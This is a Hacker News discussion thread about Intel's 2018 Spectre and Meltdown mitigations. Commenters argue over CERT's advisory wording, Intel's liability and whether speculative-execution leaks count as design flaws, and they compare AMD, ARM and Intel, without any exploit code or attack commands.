Hacker News new | comments | show | ask | jobs | submit login
Intel Issues Updates to Protect Systems from Security Exploits (intel.com)
502 points by runesoerensen 11 months ago | hide | past | web | favorite | 389 comments



Why did CERT modify their vulnerability disclosure to remove the text:

> Fully removing the vulnerability requires replacing vulnerable CPU hardware.

Proof: https://webcache.googleusercontent.com/search?q=cache:rzc6iQ...

This smells really bad to me, as if Intel pressured CERT into removing language that could have caused their market value to instantly vaporize as every consumer for the last 20 years joins a class action suit...


Try wayback machine instead of google webcache as latter isn't showing the original.

Here's the vulnerability note stating to replace hardware on 01/04/2018 at about 1800 GMT: https://web.archive.org/web/20180104032628/https://www.kb.ce...

Then here is the same page with the replace verbiage removed on 01/04/2018 at about 1900 GMT: https://web.archive.org/web/20180104180023/https://www.kb.ce...


People were mocking them for it on Twitter, and one of the researchers (Anders Fog [0]) called it "funny". It could just be that people were misled into believing that such hardware currently exists, and that CERT decided there would be less confusion to stick to currently-possible mitigation techniques. :)

In any case, I doubt Intel would pressure anyone to remove the generic imperative "buy a new CPU".

[0] https://twitter.com/anders_fogh/status/948904282568392704


>> Fully removing the vulnerability requires replacing vulnerable CPU hardware.

Imho intel would much rather them keep this language, which is why they removed it. There is no drop-in non-intel replacement for an intel CPU. Telling everyone that they need to replace CPUs is basically a mandate for them to by whatever replacement intel can cobble together. Having to replace all those chips would see intel's stock price skyrocket. The reality is that chips don't need to be replaced asap and customers have time to perhaps choose non-intel chips.


I suppose it would only make the stock price rocket if it wasn't decided in some class-action suit that Intel has to replace the CPUs for free.


"have time" ? I have a feeling of hurry because the vulnerabilities are so "easy" to exploit that attacks are probably already occurring.


That doesn't make any sense. Do you think when Takata had to recall all those defective airbags that were killing people their stock price jumped because they were able to sell replacement airbags?

A product manufacturer with serious defects almost always ends up eating the costs of hardware repair or replacement.


It could just be that the statement is incorrect or misleading.


Yes. Spectre2 can be and is being patched with a microcode update that partially disables branch prediction.


A microcode update which most users won't get... :/

https://news.ycombinator.com/item?id=16072604


What about meltdown?


Meltdown is mitigated by kernel page table isolation. See patch notes/ the attack paper


That says nothing about the need to fully replace defective hardware to avoid the hardware problem.


That says nothing about the possibility to patch the missing page table isolation with a microcode update. They have enough spare registers for a seperate C3, they could workaround the TLB flush. Since the fdiv bug HW problems are not HW problems anymore.


I don't get these calls to a class action suit... If it was intentional, it could have a reason. But I just don't get this attitude when they are having a really bad day after someone discovered a new type of attacks on their chips.


Intel isn't having a bad day. The people who are stuck with chips that enable severe security exploits are having a bad day. Actually they are going to have a bad year till the design flaw is fixed in hardware. Or maybe even 5 years. Who knows.

Intel is 100% liable to face a lawsuit over this. Consider if a major car brake manufacturer discovered that there was a design flaw in the brakes that prevented them from functioning in certain situations. It'd be facing multiple lawsuits by now whereas Intel is going with "our chips are the most secure ever" line.


I think you are confusing security and safety. Security is about dealing with malicious attackers, while safety is about making sure random events and mistakes won't kill you.

Your example with the brakes is about safety, i.e. making sure the car won't kill you during normal operation. Normally, unless their CPUs start bursting into flames, this is not a problem for Intel.

The problem here is about security. A car analogy would be that to start your car, you need a code and that code can be found by measuring how long it takes to process the input, making life easier for thieves.

As for liability, I don't think you can be liable in court if you didn't plan for something that wasn't known at the time and isn't trivial.


Ironically, isn't your analogy a literal thing?

http://www.bbc.co.uk/news/business-41367214


As for liability, I don't think you can be liable in court if you didn't plan for something that wasn't known at the time and isn't trivial.

Engineering brakes that work reliably over months and years of use isn't trivial.

Process isolation and kernel security issues have been known for decades and have been fundamental design requirements for decades.


The car analogy is very good one. Also an infamous Samsung Galaxy Note 7 comes to mind. I agree that such security hole such warrant for a replacement.


I don't believe the car analogy is good. And neither is the Note one.

In both of those cases the products can cause serious harm without any third party implication. The brakes would just go of or the battery would explode during normal function.

However, in the Intel case there has to be an attacker that actively exploits an issue in design.

To me this would be like making a class action suit against all lock vendors because they can be bypassed with the right set of tools. The fact that this affects everyone (Intel more than others) and that it took 10 years to find grants them some excuse. Also the architecture is not secret as far as I know so anybody could have audited this. They most probably did do so and found nothing until now.

Now, I do not like Intel communication around this and if it comes out that they knew this for years and decided to sit on it then it would be a different story.

Class action lawsuits are useful when there is negligence, or bad intent but in this case what could it possibly solve?


In both of those cases the products can cause serious harm without any third party implication.

Sorry, but in the 21st century world of the internet, cracking needs to be taken as a given. In many cases, "normal use" for a computing product means exposing it to use and therefore potential attack from anywhere on the internet. CPUs certainly fall into this category.


Legal liability for damages due to defective products isn't premised on the defects being intentional.


You don't have to inflict intentional injury to be liable for something like this. Intel's customers aren't getting what they paid for, so it seems pretty reasonable for the company to compensate them.

If you bought a car that was advertised as having 300 horsepower, and then the manufacturer realized it was unsafe unless they made a software change limiting the horsepower to 200, wouldn't you expect some compensation?


Time of purchase product to time of knowledge of flaw allows for time-frame to file lawsuit(s).

Example. Intel worked on rushed product to compete against AMD threadripper. That time was after the time of the known issue. Thus Intel was investing in continual bad practices and selling known bad products instead of investing in fixing the hardware flaw.

Major flaw in a car prevent selling a card until the flaw is fixed. Why shouldn't this also applying to computers that run the cars and other products?


> I don't get these calls to a class action suit... If it was intentional, it could have a reason.

You don't think people should be able to sue for negligence?!?


If responsibility is written and it says they produce unbreakable hardware, then yes.

If they don't do anything after finding out vulnerabilty - probably it depends, I dont know.

But thy are clearly putting in effort with vendors to mitigate and solve the issue. Doesn't look like negligence to me.


AMD/ARM/Intel CPUs are affected.


...by the much-harder-to-exploit timing attack that is easily mitigated by cropping timer resolution.


That is not an effective mitigation.


It looks like they expose some MSR to control the branch predictor, see:

https://twitter.com/aionescu/status/948753795105697793

https://twitter.com/aionescu/status/948818841747955713


It appears the retpoline fixes don't work in Skylake or later (it's smart enough to speculate out of it?) and will require new support for IBRS/IBPB in the microcode to mitigate.

From: https://lkml.org/lkml/2018/1/4/615


What I don't understand is why the kernel patches and microcode updates are still been worked out today. They had 6 months to work on it.

No secret channel to communicate with Linux Kernel developers? No coordinated effort? Last minute findings?

On this thread https://lkml.org/lkml/2018/1/4/174 looks like that the author is disclosing the info on the last minute.


I was wondering the same thing earlier. This doesn't feel like a disclosure that's had anywhere near ~6 months put into it.

Did the vendors ignore the disclosure initially and begin to change tactics later in the game? Based on how certain vendors have been characterizing this in their PR, I wouldn't be surprised if they didn't take the problem seriously originally.


The Ubuntu page that was on HN earlier [] claims that they were notified in early November. I have no idea if kernel people (as opposed to distro people) got notified earlier.

[]: https://wiki.ubuntu.com/SecurityTeam/KnowledgeBase/SpectreAn...


Especially microcode updates. Microcode is just a giant obscure binary for everyone outside of Intel. If there was a mitigation possible via a microcode update this could have been published months before disclosure without any meaningful risk.


IIRC Intel employs people to work on the linux kernel on behalf oh Intel. Either Intel fumbled or it isn't that easy to circumvent the problem plaging Intel's processors with a software hack.


Or, they were holding out hope for a workaround that didn't make the entire Cloud 20% slower and they couldn't make it work.


Code for the solution and then code for performance. Direct performance coding is a bad return on investment.

First prove it works and then prove it can be made better and faster ...


That’s easy for you to say. You’re not the person having to admit to a billion dollar mistake.

Everybody stalls for time when the stakes are this high. How long can I reasonably spend tying to turn this into a small problem before I have to go public with it?

Saying it’s a bigger problem than it turns out to be is a PR nightmare of its own. If there was a cheap fix then you cried wolf and killed your reputation just as dead.


Exactly this. Apparently, the details of the attack have been published in official paper(s) before the security teams of major OSes could prepare and make publicly available mitigating patches for the users. There is no patch for Debian 8.0 (Jessie), or for Qubes OS, for example.

The chatter is all about how CPU manufacturers screwed up, but there is a much more alarming issue here, I think: the apparent irresponsibility of the people who published the flaws before the security teams and the users could mitigate them. Perhaps there was a reason for accelerated public disclosure, but so far this makes no sense to me.


Seems that the new MSR results in worse perf than the retoline which is alarming. https://docs.google.com/document/u/2/d/e/2PACX-1vSMrwkaoSUBA...


Interesting:

> Note: IBRS is not required in order to isolate branch predictions for SMM or SGX enclaves

Perhaps this microcode update exposes a feature which was originally to protect these two modes? But that would mean that Intel did think about leaks through the branch predictor, only didn't make the logical leap that this could be an issue also for normal ring0/ring3...


Huh, so did Intel know about this vulnerability when they designed SGX?


Maybe, maybe not. I looked around a bit and found [1]"that the Intel SGX does not clear branch history when switching from enclave mode to non-enclave mode", which suggests either that the SGX designers were unaware of the dangers of not separating branch prediction between privilege levels, or that Intel intentionally weakened SGX so as to not reveal the similar flaw in their ring0/ring3 separation.

1: https://arxiv.org/abs/1611.06952 (Nov '16)


Intel says Broadwell or newer: https://newsroom.intel.com/wp-content/uploads/sites/11/2018/... (page 5)


I'm disheartened by the number of comments here who are taking the stance that Intel has idiot designers or that management doesn't care about security. This attack is very clever and unexpected. Even though side-channel attacks have been talked about for awhile, even the guy who developed Meltdown was surprised that it worked. It just seemed like an "in theory" security hole, not an exploitable one.

AMD isn't vulnerable to Meltdown not because they foresaw this issue, but probably because they simply weren't as aggressive as Intel in allowing speculative execution. For years people have preferred Intel over AMD cpus due to their performance advantage, due in part to that higher sophistication of their pipeline.

Or to recast it, nobody is hating on AMD right now, but AMD CPUs do allow a user process to learn some things about the kernel via timing attacks. If next month a researcher develops Meltdown2 for AMD, are AMDs designers now suddenly idiots for missing an obvious security hole?


> AMD isn't vulnerable to Meltdown not because they foresaw this issue, but probably because they simply weren't as aggressive as Intel in allowing speculative execution.

You don't see why being "aggressive" with speculatively loading data over a _protection boundary_ could be considered irresponsible? I for one, think AMD has the right to gloat if they want. It's not just AMD, besides the latest version of ARM it seems all the other CPU vendors decided to not be "aggressive" with their users' protected data (sparc, mips, amd, power, s390x).

Does it mean all those vendors and architects had PoC for years for this and were sitting on it? No but they could have had a hunch not to go that route. Just like a sane developer might have a hunch over opening a wide API surface to a server that contains sensitive data. It doesn't mean they know there is security vulnerability in one of the API endpoints, it's just sane practice.

> If next month a researcher develops Meltdown2 for AMD, are AMDs designers now suddenly idiots for missing an obvious security hole?

But who called any developers idiots here? I think you were the only one.


Side channels are really hard to protect against. Caches, buffers (maybe you can check when they are full), branch prediction, sound, vibrations, timing, electricity consumption, em waves, temperature. Things leak all over the place.


Such bullshit - there are loads of people, maybe not on SO, but on reddit etc that called them "idiot CPU developers", possibly misinterpreting what Linus said.


Someone on the internet is mean, I have no doubt. I haven't seen a lot name-calling here. Let's stick to HN and let reddit deal with its own drama.


Why not just chalk this up to Dunning-Kruger and then move on to some other, more interesting/productive use of attention?


> I'm disheartened by the number of comments here who are taking the stance that Intel has idiot designers or that management doesn't care about security.

I think you are being unfair as the GP didn't call anybody an idiot for not caring about security.

It just calls them out for insisting that this is not a flaw or a bug.


I think it makes sense in a really pedantic way: "flaw" and "bug" have always been, in my observed experience of usage, terms used to refer to the consequences of oversights.

This wasn't an oversight; this was more like... whatever you call the fact that we're still, today, choosing to employ (and even design new!) hash functions that quantum computers could probably break easily. We're making an intentional design choice, based on the perceived difficulty and current infeasability of a particular known class of attack against that design. That current hashes are vulnerable if-and-when a quantum computer comes along to crack them isn't really a "bug" or a "flaw" in our hashing algorithms; it's a known property of our hashing algorithms.

Or, for another analogy: there was a point in history when the peak of warfare was ships shooting guided missiles at other ships, and the targeted ships shooting smaller "countermissiles" that attempted to get in the way of the incoming missiles before they could hit anything important. Every missile had a faint heat signature, making it visible to infrared optics—this was an unavoidable consequence of the fact that missiles need engines to make them move. But for a long time, the idea of a heat-seeking countermissile was just infeasible or un-economical to implement, so little work was done to hide the emissions signatures of missiles. The emissions signature certainly wasn't a "bug"—it wasn't the result of an oversight; and it's a bit strange to call it a "flaw", insofar as there was no such thing as a missile that didn't have said "flaw" while still being a missile. It was a known property of the missile technology of the time. Or, if you want to think of it on a higher level, "missiles" themselves—anything that you might call a missile—had a categorical flaw.

In the same way, anything we might call a modern-day CPU is now known to have the categorical flaw of leaking at least some amount of information through speculative execution. You can minimize it (like you can minimize a missile's heat signature), but you can't get rid of it without making something we wouldn't even call a CPU any more (most things without speculative execution are, these days, considered microcontrollers.)

In that sense, I can understand Intel's insistence that they didn't make a flawed product: they made a perfectly good instance of a "computer processor"—it's just that "computer processors", as a category of product, have a problem.

You wouldn't blame the missile manufacturer for making missiles with visible emissions signatures, before heat-seeking countermissiles were invented. They didn't introduce a flaw. They made their product to order, and the order—the requirements, the demands of the customer—themselves contained the flaw, contained the supposition that it was okay to make a particular trade-off because it wasn't currently exploitable.

In the missile manufacturer's case, it was the government that said "sure, heat doesn't matter, just make it go fast"; and when heat-seeking countermissiles were invented, it was the government whose (lack of) intelligence foresight was to blame for not changing their requirements to anticipate that exploit.

In Intel's case, some customer could have foreseen the exploit and shifted the market toward demanding non-speculative-execution CPUs. Intel was just making what the customers asked for, and right up until the end, they were asking for the categorically-flawed product.


Design choices don't need patches to fix them. Flaws and bugs do.

You seem to think that this issue is inherent to speculative execution - it is not. It is due to intel performing speculative execution in a flawed way. In particular, an incorrect branch prediction should have no detectable effect on the system, whereas here it does.


> an incorrect branch prediction should have no detectable effect on the system, whereas here it does

Branch prediction is not scoped for that. Branch prediction will always change microarchitecture state, which is always detectable at some level or another. The key takeaway for designers should be that even though microarchitecture state is not exposed in the datapath it is not secured from side channel exposure.


Your argument seems reasonable, until we bring to the table all the shit that Intel did to beat AMD out of the x86 market. These deeds were from their marketing department, so no relation with chip design per se, but as a company they were still actively trying and almost succeeded in killing any diversity in the x86 market.

It’s basically like saying “we are building stuff customers wanted, we just also beat to death any other potential alternative they could want as well”


You sound like a lawyer and I don't mean that as a compliment. But alright, if this isn't a flaw, then breaking it wasn't an achievement, certainly quantum computation wouldn't be an achievement - or rather foreseeing and avoiding the consequences isn't, which is easier because of different time scales, but still.


The researchers were surprised that it worked because it shouldn't have worked.

I don't think Intel's engineers are incompetent, but be careful about the reasoning you're using.


The problem is that there are a lot of us trying to get people to take these "completely unlikely" attack vectors seriously. It's like talking to a dog or a wall. Too many humans are hardwired to respond only when confronted with an actual situation. We get frustrated because our "in theory it works..." attacks work in reality eventually and then the rest of the world is all "oh who could have predicted that ____".

We did. We, the people you called "paranoid" while we quietly try to fix things. We're the ones trying to make sure that people don't die when cyber vulnerabilities are exploited by shitty actors.


I've encountered this, with great unhappiness.

I have a theory that this heavily relates to the feedback loops and signals in play. New features are positively observable and their impact is observable from release onwards.

When defending against unknown unknowns, security is unobservable. It's observable only in its absence. All that's left are heuristics and synthetic signals like pentesting.

I wrote a multi-thousand word essay on the topic, but for an internal audience. I don't know if I could properly share it.


Yes, that's exactly right and why it's hard to sell "security" and how we get to an voluminous x86 ISA.

My own speculation is that we got here in this industry though a complete absence of liability. Bugs are not a big deal, they are _expected_ now.

The only counter example I know of is Knuth's bug reward system.


Please do share if you can, I've been thinking a lot about this topic in context of ops / "janitorial" work in general.


AMD did things the right way competing for performance without sacrificing security. What's happening right now are the consequences of Intel's actions.


AMD did things the "right" way, not because they understood the security implication, but because it was very hard to achieve such high level of speculation, and I think the performance gains didn't justify the effort for them.


Have you got a reference for that statement? Because my interpretation of what has been said so far is that AMD deliberately chose not to allow speculative dependent loads that crossed privilege boundaries by enforcing permission checks on all reads whereas Intel chose to permit all loads & rely on the fixup at the retirement stage of the pipeline to enforce privilege boundaries.

Happy to be proven wrong however.


I don't have hard evidence, but

A) they are vulnerable to two out of the three attacks, which indicates they did not in fact consider speculative execution a danger

B) it is hard to believe that if they researched the topic at AMD, they wouldn't find this vulnerability in Intel processors a long time ago


I note in passing that the AMD processor manual is explicit that all reads are checked against the privilege bit before being issued.

It’s this protection that means that AMD processors are not subject to meltdown.

All CPU manufacturers appear to have been caught on the hop by Spectre (branch prediction history side channels).


They did across priv boundaries which was the point.


How do you know this?

I think it's worth noting that it's entirely possible, that if you are a CPU execution pipeline designer that you think about memory loads/stores, L1 cache, branch prediction and speculative execution, and it occurs to you that the cache gets polluted by spec exec, and the branches can be security checks.

But the solution is simple. If the branch is important, wait for it. (Load it into L1 cache before the branch - use a memory barrier.)

The fact that this is not in any ISA docs is a likely pointer toward the possibility that it in fact hadn't occurred to them.

These attacks are the same as any new invention. Easy to see once you've grasped the concept.


I think you are missing the point. What the commenter is saying is this... right now you are saying AMD did things the right way, but if a loophole is exposed next month, will you say the same thing?

I'm neither supporting or refuting the commenter. Just explaining to you the meaning of the comment.


If AMD spotted the issue and avoided it deliberately all those years ago, why didn't they tell anyone?


There is a difference between following good security practices (gratuitous isolation, defensive design) and having exploits ready to show the world how valuable it is. Noone was claiming AMD knew of such exploits beforehand.


What are you even arguing here?

If I observe fact X which is "bleeding obvious", then it's not my responsibility to tell the world about X.

Of course this stuff isn't "bleeding obvious", but I'm going to assume that the AMD engineers thought that it was "obvious enough" to not explicitly to tell the world about it.

Besides... do you have any idea what kind of NDAs those engineers are going to have to sign?


Because they knew it was an obvious security risk?


Perhaps whoever thought about it assumed it was obvious enough that others would have realized it as well. It may simply have never occurred to them that it was worth sharing.


Intel grabs tens of billions revenue year after year, people of course expect the best of the best from them. Playing victim here doesn't work when u r an industry leader. U can not have the cake and eat it.


Latest AMD processors are on par with INTEL in terms of IPC performance, there is no evidence showing AMD's pipeline design is anything less smart than Intel's. AMD processors do not have the issue because they don't speculatively load data across the defined boundary. It is _NOT_ an "in theory" security hole, it is a security hole that managed to lower the computing performance of the entire world due to Intel's market share.

Intel designers should of course be blamed for such issues - full price paying customers are now suffering from performance penalises for up to 30% on some workload, when each new generation of Intel processors give you 5-10% performance boost in the last 5-10 years. Sure, the issue is a surprise for everyone, but if they are designing processors to power billions of devices, they are expected and required to be exceptional.

Let's make it perfect clear - Intel designers don't have to be smarter, they can give up their market share to AMD. It is a privilege to design chips for the entire world, it is not a right. When things go wrong, they need to admit the mistakes and fix their craps, sadly Intel is putting too much efforts into its PR rubbish ATM.


Meltdown could have been avoided by following what is in CPU design text books about speculative execution.

Spectre is clever. Meltdown, as known today, is (mainly) an Intel major fuck-up.


The poster you responded to never said that Intel engineers are idiots. Intel made a huge hole for themselves in the way they implemented ME.

The reason for the strong reaction over these flaws is not because of the severity of this issue, nor does anyone believe Intel engineers are idiots. They are getting blowback because they implemented a closed solution for a powerful feature - Management Extensions.

They lost a lot of trust, which makes it far harder to recover when new issues occur.


Did Intel promise in their docs that side channel attacks are not possible? If not, then OS writers are equally to blame for making incorrect assumptions. I don't think this is Intel's fault alone.

On a grander note, there are probably hundreds of even more esoteric side channel attacks all across the system since every process changes the system state. This is more like the beginning of a new style of attacks now that one is shown to be practical, rather than any particular entity's fault. Hardware designers will need to consider informational and physical isolation in a more rigorous way, and there may be theoretical limits that bound the performance-security tradeoff when you share resources.


They do not. And more problematically for the "It's all Intel's fault" story, in the SGX documentation they explicitly state that their chips do not protect against side channel attacks and that it's up to the software developer to handle it. As SGX is a part of the CPU effectively that means their official chip docs rule out side channel protection as a feature.

I don't know if playing the blame game here is going to be productive. All CPUs are vulnerable to side channel attacks of various kinds and focusing on Meltdown specifically seems like missing the forest for the trees - especially as ARM has the same issue in some of their designs.


meta comment - but when I first saw this comment it was in reply to carwyn's top level comment but now it is a top level comment unto itself? that makes a lot of the replies not make sense now - was this comment moved?


Well the first problem is obvious with hindsight. Consider all the state changes that occur when an instruction is speculatively executed. Are any of these rolled back?

In this case, the cache is not being rolled back. Neither (presumably) is the branch predictor. And then what of the performance counters? (do they count if an instruction is not retired?). I see many potential attack vectors opening up and it's much harder to prove that any of these state changes can't be exploited.


I mean... yes?

Why would it be any different?


I disagree. The attacks are clever to focus on Speculative evaluation but are otherwise fairly simple (timing attacks are well known). I'm surprised such attacks have not been discovered earlier, as speculative evaluation seems quite broken. Security is likely not a top priority for Intel and probably not something their verification teams are targeting. There is perhaps a gap in the market for a vendor focusing on secure CPUs.


For an architecture that has been around for so long, if the attack was only discovered recently, then is it fair to call it 'simple'? In retrospect, anything can be obvious.


We don't know when it was discovered first though. We only know that it's been disclosed now.


An obvious flaw doesn't become less obvious if it has been found. So it might be that some blackhat knew about it before, but there a lot of smart sufficiently-pale-shade-of-gray people out in the world for obvious problems to be found in less than decades. So I don't think it's an obvious problem.

It seems that at least some ARM might be affected by both Spectre and Meltdown.

So far, I have only seen negative meltdown tests for older AMD cores. Is there anything known for Ryzen except for the PR by AMD (and the kernel patch, which might be based on the google project zero information about older AMD cores)?

While meltdown is "easy" to fix by not reading memory if unprivileged to do so, spectre is a lot harder. Even if the caches are made safe, for example by having "speculative" cache lines which will be renamed into the "true" cache when the speculative thread is actually accepted and retired: It's not the only place where there is hidden state. For example, the branch prediction might be affected, and might give a timing signal.


From [1]:

> We reported this issue to Intel, AMD and ARM on 2017-06-01.

I don't think they have been twidling their thumbs with such a huge discovery without informing constructors.

[1] https://googleprojectzero.blogspot.com/2018/01/reading-privi...


We know (or can guess) approximately when the project zero team discovered the issue, but I think your parent comment meant that we don't know when _someone_ discovered it first. Maybe the project zero team were the very first to discover it, or maybe some state actor discovered it a decade ago and has been using it since then.


Right - but as always with a vulnerability, especially one that's borderline-undetectable through any kind of log analysis, the question becomes "were Google really the first to think of this?" and the tinfoil kingdom builds itself from there.


It's simple to describe and all the pieces are big red flags even on their own: Speculative evaluation has side-effects (e.g. the cache is not rolled back), speculative evaluation omits security checks, timing attacks can be used to determine the cache memory. It can even be exploited using JavaScript, no hand crafted CPU instructions required.

Perhaps it took so long to find because it's only relativity recently that companies have been paying people to break the hardware?


There are still a lot of simple attacks yet to be discovered. In SW and in HW designs.


AMD isn't vulnerable to Meltdown not because they foresaw this issue, but probably because they simply weren't as aggressive as Intel in allowing speculative execution

What do you mean by 'aggressive' here? Cause frankly, I think aggression isn't a good trait to be exploiting in business - it's not the same as competitiveness.

Is it 'they would have done this if they could but they didn't try hard enough', or is it 'they could have done this but didn't have the nerve to take the risk'?

In the latter case, I'd argue that a lack of willingness to trade off security against performance is a Good Thing in line with engineering ethics. In the former case, it seems like you're assuming business comeptition is always construed as a zero-sum game - is this correct?


They weren't making a trade-off because it was not a known risk. No one had any reason to think that speculative jumps would lead to a large security hole.


My understanding is that it was a known risk, see the various citations already provided throughout this thread. Meltdown is a bugged design decision because it failed to consider the consequences of asynchronously verifying permission for speculative executions that reach into kernel space, which allows the Spectre attack to affect kernel memory too. That's the limitation of the reach of the "Intel bug" as far as I know, the rest is generally applicable.

The Spectre attack is a side effect of performing speculative execution without wiping caches, something that was, until yesterday, an intentional and clearly-chosen industry design direction, standard across almost every commercial CPU produced in the last 20 years, despite the known risk of "theoretical" timing attacks.

The only reason for Intel to make the decisions that led them to be vulnerable to Meltdown was to sacrifice correctness/safety for performance, and failing to consider the potential side effects of that sacrifice (cache heat). They obviously made a bad risk tradeoff there (though I don't necessarily fault them).

AMD could definitely make the argument that Meltdown was an irresponsible "benchmark cheat" from Intel.

EDIT: And let me further clarify, ARM was "cheating" and doing the permission check asynchronously on some models too (i.e., some of their chips are also vulnerable to Spectre in Kernel-space aka Meltdown). It's not solely an Intel issue.


Speculating memory reference reads across security boundaries is not a trade-off (except if you can prove that you will not further act on them in any data dependant way that is observable). That's mostly common sense.

Spectre does not need that -- but OTOH is more difficult to exploit; it is in a whole different category. There is a reason they have different names.


This seems to be subject to debate...


They are still sticking to this line:

"This is not a bug or a flaw in Intel products. These new exploits leverage data about the proper operation of processing techniques common to modern computing platforms, potentially compromising security even though a system is operating exactly as it is designed to."

https://www.intel.com/content/www/us/en/architecture-and-tec...


It's like we spent 20 years building houses out of wood, and then suddenly someone discovered fire. "This is not a flaw in Intel lumber supplies. This new 'fire' leverages chemical properties common to all plant products, potentially compromising structural integrity even though the lumber is operating exactly as it was designed to."

(Edit: It seems this analogy may be overly kind to Intel. Read all the replies to this comment for more information.)


> and then suddenly someone discovered fire

This is not really like that. The dangers of speculative execution were known before, and, separately, the processor itself provided memory isolation capabilities. That the processor would ignore its own memory isolation principles when speculating about the next instruction to execute is a critical base of these vulnerabilities.


So maybe a better analogy would be that they built fire retardant layers into buildings, but neglected the fact that heat could still pass through the layers and start fires on the other side without burning the layer itself?


The asbestos is working as intended as insulation/fire retardant. Sorry 'bout the mesothelioma.


This one's good, because, like asbestos, there's not really a good alternative to this on current platforms other than giving up some of the performance value of branch prediction in exchange for long-term safety. As far as I know, asbestos remains an unparalleled material for fireproofing, and it is still used sometimes under controlled conditions, even though we've been forced to accept other materials for general use.


AFAIK, mineral wools and silica fabrics have replaced much of the high temperature insulation that asbestos used to do. I believe they do the job just as well, but they're more expensive because they're manufactured rather than mined.


A better analogy would be that they presented specs that showed that the building was supposed to be fire-proof but still insisted on dirverting from the specs and building best practices by cladding it with highly flammable material to improve its heating performance.

Now Intel has his own Grenfel tower.


Unlike "neglecting the fact that heat could still pass through the layers", speculative execution doesn't merely allow something that was previously possible. It allows something that was previously impossible, and while doing so undermines another, more critical, feature of the processor.


Stop trying to make the analogy fit. It's not a good analogy.


Wouldn't a good analogy rather have the effect of rationalising what's already ridiculous?


They made the wood fire retardand but it still burns - just not as easily as untreated wood - while selling it as fireproof wood.


As absurdum, so that they could advertise the home being more efficient, faster to heat and less wasteful of the lucky phenomenon peculiar to their furnace design for running beyond the specification so instead of overheating one room, or expensive distribution, the furnace gets you really quick hot water and the excess energy isn't wasted, so compared to fully internally insulated homes, the benefits just keep adding up, e.g. installing plenum cable would be inefficient because this system dumps the excess heat quickly through the house, the ability to convect nicely preventing past occurrences of furnace fires. To be the most efficient inhabitant (kernel process) Intel recommends you enter and exit the over and under heated rooms frequently to manage your body temperature. This design is excellent for your hyperactive residents, please refer to our release notes for the use of rooms either exclusively or during long operations such as Netflix consumption.


If this analogy was apt I think I would be on their side - but we're talking about "wood" they designed and the "fire" is not some new phenomenon but an actual thing theyve supposedly designed against (unauthorized access of memory). [from my reading as a lay-person, please let me know if this is incorrect]


The analogy is a bit tortured, but in this case both companies build houses out of wood because it has the be performance and both cover them with fire retardant materials. One company discovered that they could make better houses if the fire retardant material was held on with glue instead of screws, but failed to account for the fact that the fire might melt the glue.

Probably best to just defenstrate this analogy.


I didn't know you could defenestrate abstract things. I thought it was just for people.


Anything can be thrown out a window!


It's like we spent 20 years building houses out of wood, and then suddenly someone discovered fire.

Goodness you just described my current work situation that's causing me to rip my hair out. This is a deeply human problem, and I've spent a year trying to mitigate it, but each time the discussion comes up I leave the conference room feeling like certain actors have a personal financial stake in wool fibers.

(No I don't work for Intel)


At work the issue-tracker has open bugs from 2011 detailing how to do SQL injection attacks using some common search interfaces, but noooooo, the sales team just has to update the visual style of the generated contract PDFs... <sigh>


What they are really saying is "It's not just Intel processors. AMD, ARM, and others are just as vulnerable."


Which is half true. All of them are vulnerable to Spectre. So far as I've heard only Intel (and maybe ARM) are vulnerable to Meltdown, because Meltdown exploits the lack of security checks on speculative execution that only Intel implemented. It's ambiguous if ARM is vulnerable, I've only heard people saying either "maybe" or that they haven't validated that.

Edit: Elsewhere I found a link to ARMs page where they breakdown exactly which of their processors are vulnerable to both Metldown and Spectre and it looks like quite a few of them are vulnerable to one or both of them.


I recognize the positive spin, the fact of hardware vulnerability is still little understood, and the trust placed in the cloud ecosystems is almost absolute. I'm aware that I would be planning to go on a Microsoft like security commitment and the sheer resources available to Intel if concentrated on the silicon features capable of e.g. detecting a miscreant hypervisor look like the next wave of products and marketing. To achieve this spin, however, Intel needs to day much more than they have. They can maintain their current line but score points with sceptics by demonstrating how some attacks work on Intel processors in the wild. Coordinated with Industry wide patches, making more point which is missed here how Microsoft and others patched branches in November, the wrap is to offer all customers running on vulnerable silicon migration and s performance bump. This is not a cheap process, but the political climate almost demands resolution at this level.


To me this feels like saying, "My program doesn't have a bug, it's executing the code that I wrote correctly." The actual bug is that the code isn't correct.

In Intel's case, even though the operation is correct, it's the actual design that's flawed.


Yeah... "Hey Mr. CPU-supplier, if I do these things then I can see with 100% certainty the contents of memory areas which I'm not allowed to read!"

"Well, that's an interesting hack, I guess you can! But everything works as designed, so there's no flaw!"


This reads like the Patrick Star's "Not my Wallet" meme.


"Works as coded"


I think what Intel is trying to say that this feature makes the chips insecure by design. It’s kind of like in Python where can get around the week protection for classes, methods, and variable to make them pseudo private by putting underscores in front of them.


Except that these CPUs were not designed to be insecure. CPU makers spent decades marketing their architectures as able to support the implementation of secure operating systems. All of a sudden it is clear that this is not possible without heavy dose of software stopgaps. It is a fundamental flaw on CPU architecture that was not disclosed by these companies.


Neither was anyone else aware of these class of security issues with CPUs until recently.


Oh people were aware, we just neglected the issues IBM and other time sharing systems learned in the 70s.


Was there anything like this back then? (Speculative execution, L1 cache, branch prediction all in the same ISA?)


If they were aware, why didn't anyone raise this issue till now?


The people that were aware were probably extracting value out of the fact that not everyone knew.

Could be not worth making a public stink, could be weaponizing the exploit, could be coordinated disclosure.


you mean all these security researchers kept it a secret for the last decade or two?


Until a few days, researchers couldn't prove that this was possible because there was no example of such exploits. But there was the idea that this could be possible. Also this doesn't mean that people with other interests didn't have their own versions of this exploit and kept it a secret.


I'm scarred by the CISC - RISC wars, which were serious for my business at the time. So in a year I'm anticipating Open VMS I'm x64 , having a indelible memory of the memory space rings and system calls depending on explicit separation, I remember thinking to myself, well only four rings in Alpha are critical to VMS, and Intel Pentium has that many rings...so why don't they port straight to the main Intel platform? Is this leaking mode the reason?


If you fall 10 floors and die, it's not the architect's fault for not putting a handrail around the balcony. It's your fault for improper use of gravity.

/s


I lived on the seventh floor, so always wondered if that meant I could safely keep a cat?

[Urban legend, afaik, cats can't right themselves with less than the seventh floor height to fall..]


Cats can right themselves in about 12 inches.

The problem is they land with legs extended down from floors 1 to about 7 (bad: impact is transmitted up through shoulders and hips), while higher than about floor 7 they spread their legs out and attempt to parachute (better: impact is uniform over entire ventral surface, terminal velocity is lower, mortality rate drops).

Source: am DVM and interned at AMC in Manhattan.


Very cool thank you! Also prewitt and Travis above and below..

